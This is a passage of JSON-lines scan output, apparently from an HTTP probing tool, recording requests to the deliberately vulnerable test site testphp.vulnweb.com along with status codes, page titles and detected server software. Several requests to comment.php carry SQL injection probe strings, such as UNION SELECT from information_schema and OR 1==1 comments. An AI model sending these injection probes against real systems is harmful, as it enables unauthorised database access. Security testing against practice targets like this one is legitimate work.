categories\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/AJAX/userinfo.php\",\"time\":\"347.030491ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":117,\"status_code\":200,\"content_length\":6115,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:51.474791618Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/categories.php/artists.php\",\"input\":\"http://testphp.vulnweb.com/categories.php/artists.php\",\"title\":\"picture categories\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/artists.php\",\"time\":\"359.114304ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":117,\"status_code\":200,\"content_length\":6115,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:51.593925549Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/categories.php/cart.php\",\"input\":\"http://testphp.vulnweb.com/categories.php/cart.php\",\"title\":\"picture categories\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/cart.php\",\"time\":\"353.622581ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":117,\"status_code\":200,\"content_length\":6115,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:51.648030947Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/categories.php/categories.php\",\"input\":\"http://testphp.vulnweb.com/categories.php/categories.php\",\"title\":\"picture categories\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/categories.php\",\"time\":\"345.427329ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":117,\"status_code\":200,\"content_length\":6115,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:51.677249816Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/categories.php/disclaimer.php\",\"input\":\"http://testphp.vulnweb.com/categories.php/disclaimer.php\",\"title\":\"picture categories\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/disclaimer.php\",\"time\":\"355.051409ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":117,\"status_code\":200,\"content_length\":6115,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:51.724276962Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/categories.php/guestbook.php\",\"input\":\"http://testphp.vulnweb.com/categories.php/guestbook.php\",\"title\":\"picture categories\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/guestbook.php\",\"time\":\"358.336055ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":117,\"status_code\":200,\"content_length\":6115,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:51.754453998Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/categories.php/images/logo.gif\",\"input\":\"http://testphp.vulnweb.com/categories.php/images/logo.gif\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/images/logo.gif\",\"time\":\"349.444865ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:51.928037703Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/categories.php/index.php\",\"input\":\"http://testphp.vulnweb.com/categories.php/index.php\",\"title\":\"picture categories\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/index.php\",\"time\":\"353.26282ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":117,\"status_code\":200,\"content_length\":6115,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:51.997522464Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/categories.php/listproducts.php?cat=%27\",\"input\":\"http://testphp.vulnweb.com/categories.php/listproducts.php?cat=%27\",\"title\":\"picture categories\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/listproducts.php?cat=%27\",\"time\":\"350.687473ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":117,\"status_code\":200,\"content_length\":6115,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:52.015575356Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/categories.php/listproducts.php?cat=1\",\"input\":\"http://testphp.vulnweb.com/categories.php/listproducts.php?cat=1\",\"title\":\"picture categories\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/listproducts.php?cat=1\",\"time\":\"353.491851ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":117,\"status_code\":200,\"content_length\":6115,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:52.072908548Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/categories.php/listproducts.php?cat=2\",\"input\":\"http://testphp.vulnweb.com/categories.php/listproducts.php?cat=2\",\"title\":\"picture categories\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/listproducts.php?cat=2\",\"time\":\"344.999657ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":117,\"status_code\":200,\"content_length\":6115,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:52.270268827Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/categories.php/listproducts.php?cat=3\",\"input\":\"http://testphp.vulnweb.com/categories.php/listproducts.php?cat=3\",\"title\":\"picture categories\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/listproducts.php?cat=3\",\"time\":\"341.285256ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":117,\"status_code\":200,\"content_length\":6115,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:55.500788983Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/categories.php/listproducts.php?cat=4\",\"input\":\"http://testphp.vulnweb.com/categories.php/listproducts.php?cat=4\",\"title\":\"picture categories\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/listproducts.php?cat=4\",\"time\":\"353.253333ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":117,\"status_code\":200,\"content_length\":6115,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:55.596867948Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/categories.php/login.php\",\"input\":\"http://testphp.vulnweb.com/categories.php/login.php\",\"title\":\"picture categories\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/login.php\",\"time\":\"345.409016ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":117,\"status_code\":200,\"content_length\":6115,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:55.686766365Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/categories.php/privacy.php\",\"input\":\"http://testphp.vulnweb.com/categories.php/privacy.php\",\"title\":\"picture categories\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/privacy.php\",\"time\":\"355.497575ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":117,\"status_code\":200,\"content_length\":6115,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:55.729403833Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/categories.php/style.css\",\"input\":\"http://testphp.vulnweb.com/categories.php/style.css\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/style.css\",\"time\":\"343.794066ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:56.114941972Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/categories.php/userinfo.php\",\"input\":\"http://testphp.vulnweb.com/categories.php/userinfo.php\",\"title\":\"picture categories\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/userinfo.php\",\"time\":\"353.552121ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":117,\"status_code\":200,\"content_length\":6115,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:56.475450779Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/categories.php2\",\"input\":\"http://testphp.vulnweb.com/categories.php2\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php2\",\"time\":\"356.502816ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:56.47735733Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/categories.php2L\",\"input\":\"http://testphp.vulnweb.com/categories.php2L\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php2L\",\"time\":\"353.430434ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:56.724380673Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/categories.phpA01\",\"input\":\"http://testphp.vulnweb.com/categories.phpA01\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.phpA01\",\"time\":\"346.584874ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:57.2694685Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/categories.phpConnection:\",\"input\":\"http://testphp.vulnweb.com/categories.phpConnection:\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.phpConnection:\",\"time\":\"348.746927ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:57.408981761Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/categories.phpUser-Agent:\",\"input\":\"http://testphp.vulnweb.com/categories.phpUser-Agent:\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.phpUser-Agent:\",\"time\":\"352.440229ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:59.059770075Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/categories.phpYou\",\"input\":\"http://testphp.vulnweb.com/categories.phpYou\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.phpYou\",\"time\":\"343.738033ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:00.151923101Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/cgi-bin/1\",\"input\":\"http://testphp.vulnweb.com/cgi-bin/1\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/cgi-bin/1\",\"time\":\"357.832245ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":23,\"lines\":10,\"status_code\":404,\"content_length\":273,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:00.414980591Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/cgi-bin/13/6/2020\",\"input\":\"http://testphp.vulnweb.com/cgi-bin/13/6/2020\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/cgi-bin/13/6/2020\",\"time\":\"339.073865ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":23,\"lines\":10,\"status_code\":404,\"content_length\":273,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:00.717908281Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/cgi-bin/13/6/20205\",\"input\":\"http://testphp.vulnweb.com/cgi-bin/13/6/20205\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/cgi-bin/13/6/20205\",\"time\":\"348.808244ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":23,\"lines\":10,\"status_code\":404,\"content_length\":273,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:01.461670814Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/clearguestbook.phpGET\",\"input\":\"http://testphp.vulnweb.com/clearguestbook.phpGET\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/clearguestbook.phpGET\",\"time\":\"350.305685ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:01.487648599Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/clientaccesspolicy.xml\",\"input\":\"http://testphp.vulnweb.com/clientaccesspolicy.xml\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/clientaccesspolicy.xml\",\"time\":\"342.810628ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":23,\"lines\":13,\"status_code\":200,\"content_length\":307,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:01.563913188Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/comment.php4\",\"input\":\"http://testphp.vulnweb.com/comment.php4\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/comment.php4\",\"time\":\"356.112474ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:01.577976197Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/comment.php4H\",\"input\":\"http://testphp.vulnweb.com/comment.php4H\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/comment.php4H\",\"time\":\"356.182721ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:01.620647382Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/comment.php?aid=%27%20UNION%20SELECT%20%2A%20FROM%20information_schema%20--\",\"input\":\"http://testphp.vulnweb.com/comment.php?aid=%27%20UNION%20SELECT%20%2A%20FROM%20information_schema%20--\",\"title\":\"comment on artist\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/comment.php?aid=%27%20UNION%20SELECT%20%2A%20FROM%20information_schema%20--\",\"time\":\"348.183558ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":125,\"lines\":39,\"status_code\":200,\"content_length\":1252,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:01.821964436Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/comment.php?aid=%271+1%27\",\"input\":\"http://testphp.vulnweb.com/comment.php?aid=%271+1%27\",\"title\":\"comment on artist\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/comment.php?aid=%271+1%27\",\"time\":\"340.008915ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":125,\"lines\":39,\"status_code\":200,\"content_length\":1252,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:01.939817621Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/comment.php?aid=%27x%27\",\"input\":\"http://testphp.vulnweb.com/comment.php?aid=%27x%27\",\"title\":\"comment on artist\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/comment.php?aid=%27x%27\",\"time\":\"338.886424ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":125,\"lines\":39,\"status_code\":200,\"content_length\":1252,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:02.007054836Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/comment.php?aid=-1\",\"input\":\"http://testphp.vulnweb.com/comment.php?aid=-1\",\"title\":\"comment on artist\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/comment.php?aid=-1\",\"time\":\"352.355133ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":125,\"lines\":39,\"status_code\":200,\"content_length\":1252,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:02.029617273Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/comment.php?aid=1\",\"input\":\"http://testphp.vulnweb.com/comment.php?aid=1\",\"title\":\"comment on artist\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/comment.php?aid=1\",\"time\":\"343.718098ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":125,\"lines\":39,\"status_code\":200,\"content_length\":1252,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:02.079511767Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/comment.php?aid=1%20OR%201==1\",\"input\":\"http://testphp.vulnweb.com/comment.php?aid=1%20OR%201==1\",\"title\":\"comment on artist\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/comment.php?aid=1%20OR%201==1\",\"time\":\"348.428071ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":125,\"lines\":39,\"status_code\":200,\"content_length\":1252,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:02.107248344Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/comment.php?aid=1%20OR%201==1%20--\",\"input\":\"http://testphp.vulnweb.com/comment.php?aid=1%20OR%201==1%20--\",\"title\":\"comment on artist\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/comment.php?aid=1%20OR%201==1%20--\",\"time\":\"348.431727ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":125,\"lines\":39,\"status_code\":200,\"content_length\":1252,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:02.278824567Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/comment.php?aid=1+1\",\"input\":\"http://testphp.vulnweb.com/comment.php?aid=1+1\",\"title\":\"comment on artist\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/comment.php?aid=1+1\",\"time\":\"344.748718ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":125,\"lines\":39,\"status_code\":200,\"content_length\":1252,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:02.356373462Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/comment.php?aid=1A01\",\"input\":\"http://testphp.vulnweb.com/comment.php?aid=1A01\",\"title\":\"comment on artist\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/comment.php?aid=1A01\",\"time\":\"352.377543ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":125,\"lines\":39,\"status_code\":200,\"content_length\":1252,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:02.36634013Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/comment.php?aid=2\",\"input\":\"http://testphp.vulnweb.com/comment.php?aid=2\",\"title\":\"comment on artist\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/comment.php?aid=2\",\"time\":\"342.814043ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":125,\"lines\":39,\"status_code\":200,\"content_length\":1252,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:02.428045916Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/comment.php?aid=3\",\"input\":\"http://testphp.vulnweb.com/comment.php?aid=3\",\"title\":\"comment on 